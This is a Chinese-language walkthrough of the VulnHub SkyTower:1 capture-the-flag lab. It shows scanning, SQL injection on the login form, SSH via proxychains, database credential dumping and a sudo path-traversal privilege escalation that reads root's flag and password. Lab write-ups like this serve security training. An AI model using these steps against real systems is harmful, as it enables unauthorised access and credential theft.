一、靶机下载地址
SkyTower: 1 ~ VulnHub
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:54:4A:37'
![](https://img-blog.csdnimg.cn/img_convert/1f184f2b898e0277195185f1bd811cbe.png)
2、端口扫描
# 使用命令
nmap 192.168.7.61 -p- -sV
![](https://img-blog.csdnimg.cn/img_convert/ddc90809a07673aa55809e84935580da.png)
3、指纹识别
# 使用命令
whatweb http://192.168.7.61
![](https://img-blog.csdnimg.cn/img_convert/7ab5be9cff6c2935a13d0d8721cb785f.png)
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.7.61"
![](https://img-blog.csdnimg.cn/img_convert/4f40af1ddd5cca826f12803b903a98f5.png)
三、获取shell权限和提权
1、访问靶机IP地址,为一个登录界面
![](https://img-blog.csdnimg.cn/img_convert/f99824a0480b5c25244d81fe1b7632b8.png)
2、使用burp抓包,尝试sql注入,发现账号和密码为john:hereisjohn
![](https://img-blog.csdnimg.cn/img_convert/ddff328d23022645b7f660f557dce7d7.png)
3、尝试使用获取到的账号和密码进行ssh
登录发现未登录成功,尝试编辑代理
# 使用命令
vim /etc/proxychains4.conf
![](https://img-blog.csdnimg.cn/img_convert/3c968dcfc528ef059d473c573f489404.png)
4、编辑完代理后使用proxychains
进行连接
# 使用命令
proxychains ssh john@192.168.7.61 -t "/bin/sh"
![](https://img-blog.csdnimg.cn/img_convert/4428048314c7efa9cb1f7397409a0b46.png)
5、输入sudo -l发现不能使用sudo提权
# 使用命令
sudo -l
![](https://img-blog.csdnimg.cn/img_convert/3648101b08ace097212e0468b5e63b85.png)
6、 login.php存在sql注入,查看下login.php文件,发现数据库的账号和密码
# 使用命令
cat /var/www/login.php
![](https://img-blog.csdnimg.cn/img_convert/4a3aa369747fd8763787fe31322b6dbd.png)
7、连接数据库
# 使用命令
mysql -u root -p
![](https://img-blog.csdnimg.cn/img_convert/c267c7569127e395a2ca149b1825239a.png)
8、查看数据库信息
# 使用命令
show database;
![](https://img-blog.csdnimg.cn/img_convert/93bd50e2dde1b6f5c8df1e64a1f6454b.png)
9、查看SkyTech数据库下的表名
# 使用命令
use SkyTech;
show tables;
![](https://img-blog.csdnimg.cn/img_convert/76ae2255ff6322467fd95ce8b5d35c0f.png)
10、查看表下的数据
# 使用命令
select * from login
![](https://img-blog.csdnimg.cn/img_convert/9631ca699b0cb90805de577f5be543d7.png)
11、使用ssh
连接sara
用户
# 使用命令
proxychains ssh sara@192.168.7.61 -t "/bin/sh"
![](https://img-blog.csdnimg.cn/img_convert/c633cbc4c22ab5be7cb17aebb0fdd2dd.png)
12、 再次使用sudo -l
查看权限
# 使用命令
sudo -l
![](https://img-blog.csdnimg.cn/img_convert/6858be6df8c73f8a1abd87c3b755b4fa.png)
13、 我们利用accounts/的权限,查看root下的文件,发现root用户的密码为theskytower
# 使用命令
sudo ls /accounts/../root
sudo cat /accounts/../root/flag.txt
![](https://img-blog.csdnimg.cn/img_convert/b6b8ce13613ef78375e0253a9ac54c40.png)
14、 使用ssh连接root用户,提权成功
# 使用命令
proxychains ssh root@192.168.7.61 -t "/bin/sh"
![](https://img-blog.csdnimg.cn/img_convert/4f1e18a061b099fb2470ce3fe3935078.png)